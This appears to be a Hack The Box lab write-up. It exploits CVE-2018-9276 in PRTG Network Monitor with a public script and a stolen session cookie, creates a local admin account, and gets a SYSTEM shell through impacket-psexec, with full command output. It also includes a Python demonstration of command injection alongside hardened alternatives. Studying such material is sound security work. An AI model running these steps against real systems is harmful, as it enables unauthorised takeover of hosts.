OS Command Injection


The target system is hosting an outdated instance of PRTG Network Monitor. A misconfigured FTP server let me extract the credentials for the web application, and I was able to authenticate to it. I then [[netmon_cve-2018-9276#cve-2018-9276|confirmed]] the vulnerability and found an [[Netmon_CVE-2018-9276#Exploit|exploit]]. CVE-2018-9276 is an authenticated OS command injection in PRTG's notification feature (fixed in 18.2.39), so a valid web session is all that is needed to run commands on the host with the privileges of the PRTG service, which runs as SYSTEM on a default install.

┌──(kali㉿kali)-[~/archive/htb/labs/netmon]
└─$ ./CVE-2018-9276.sh 
 
[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] vendor homepage: https://www.paessler.com/prtg                          [*] 
[*] version: 18.2.38                                                        [*] 
[*] cve: CVE-2018-9276                                                      [*] 
[*] reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 
 
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 
 
[+]#########################################################################[+] 
 example usage: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1" 

Running the exploit with no arguments prints its usage. The target URL goes to the -u flag and the cookie string from an authenticated browser session to the -c flag.

I grab the cookie string from the browser's developer tools. OCTOPUS1813713946 is the PRTG session cookie; the _ga and _gid entries are only Google Analytics cookies: _ga=GA1.4.1734379368.1680689615; _gid=GA1.4.1195484187.1680689615; OCTOPUS1813713946=e0E2NTkzRkFBLTVDNTktNDIwNS1COEIwLUUwMEMxNTg5NkM2Nn0%3D

┌──(kali㉿kali)-[~/archive/htb/labs/netmon]
└─$ ./cve-2018-9276.sh -u http://$IP -c '_ga=GA1.4.1734379368.1680689615; _gid=GA1.4.1195484187.1680689615; OCTOPUS1813713946=e0E2NTkzRkFBLTVDNTktNDIwNS1COEIwLUUwMEMxNTg5NkM2Nn0%3D'
 
[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] vendor homepage: https://www.paessler.com/prtg                          [*] 
[*] version: 18.2.38                                                        [*] 
[*] cve: CVE-2018-9276                                                      [*] 
[*] reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 
 
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 
 
[+]#########################################################################[+] 
 
 [*] file created 
 [*] sending notification wait....
 
 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....
 
 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....
 
 
 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! 

Launching the exploit with the session cookie creates a new local administrator account, pentest:P3nT3st! (the script's progress messages drop the trailing "!", but the banner and the final line confirm it).
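To make the vulnerability class concrete, here is an added, generic illustration of the OS command injection behind CVE-2018-9276. It is not PRTG's code and not the page's exploit script: it models a hypothetical notification feature that runs a helper program with an operator-supplied "parameter" string, with echo standing in for the helper and sh standing in for the PowerShell host the real bug lived in, so it runs offline on any POSIX system. The attacker input is constructed to mirror the shape of the page's payload (a filename followed by a second command).

```python
"""Generic illustration of the OS command injection class behind CVE-2018-9276.

Added example, not PRTG's code and not the page's exploit script. It models a
notification feature that runs a helper program with an operator-supplied
"parameter" string: the vulnerable form builds a shell command by string
concatenation, the hardened form passes an argv list so no shell ever parses
the parameter. echo and POSIX sh stand in for the real helper and PowerShell.
"""
import shlex
import subprocess
from typing import List

# Hypothetical helper the notification runs; echo stands in for the real script.
HELPER = "echo"

# Constructed attacker input: a plausible filename followed by a second command,
# mirroring the "add a local admin" shape of the payload the page's exploit sends.
ATTACKER_PARAM = "test.txt; echo INJECTED-net-user-pentest"


def unsafe_command(param: str) -> str:
    """Vulnerable pattern: untrusted text concatenated into a command line."""
    return f"{HELPER} {param}"


def run_unsafe(param: str) -> List[str]:
    """Run the concatenated command through the shell; the ';' splits it into two commands."""
    proc = subprocess.run(unsafe_command(param), shell=True,
                          capture_output=True, text=True, check=False)
    return proc.stdout.splitlines()


def run_safe(param: str) -> List[str]:
    """Hardened pattern: argv list, the parameter reaches the helper as one argument."""
    proc = subprocess.run([HELPER, param], capture_output=True, text=True, check=False)
    return proc.stdout.splitlines()


def run_quoted(param: str) -> List[str]:
    """If a shell is unavoidable, quote the parameter so metacharacters are inert."""
    cmd = f"{HELPER} {shlex.quote(param)}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=False)
    return proc.stdout.splitlines()


if __name__ == "__main__":
    # Vulnerable: two lines of output, the second one is the injected command.
    print("unsafe :", run_unsafe(ATTACKER_PARAM))
    # Hardened: one line, the whole parameter printed literally.
    print("safe   :", run_safe(ATTACKER_PARAM))
    print("quoted :", run_quoted(ATTACKER_PARAM))
```

The vulnerable path prints two lines because sh treats the ";" in the parameter as a command separator, exactly the mechanism that let the exploit run net user and net localgroup on the target; the argv and quoted forms print the parameter as a single literal string.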

Since the target system also exposes WinRM, I could use that to gain a foothold. Alternatively, because the new account is a member of the local Administrators group, impacket-psexec over SMB gives a SYSTEM shell directly:

┌──(kali㉿kali)-[~/archive/htb/labs/netmon]
└─$ impacket-psexec 'pentest:P3nT3st!@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file gGsJArmm.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service ZEEv on 10.10.10.152.....
[*] Starting service ZEEv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
netmon
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1a
   IPv6 Address. . . . . . . . . . . : dead:beef::c81c:b924:b7e5:558
   Link-local IPv6 Address . . . . . : fe80::c81c:b924:b7e5:558%3
   IPv4 Address. . . . . . . . . . . : 10.10.10.152
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%3
                                       10.10.10.2

Tunnel adapter isatap.{a764ae58-73c4-468a-b78d-4878fecefc66}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

System Level Compromise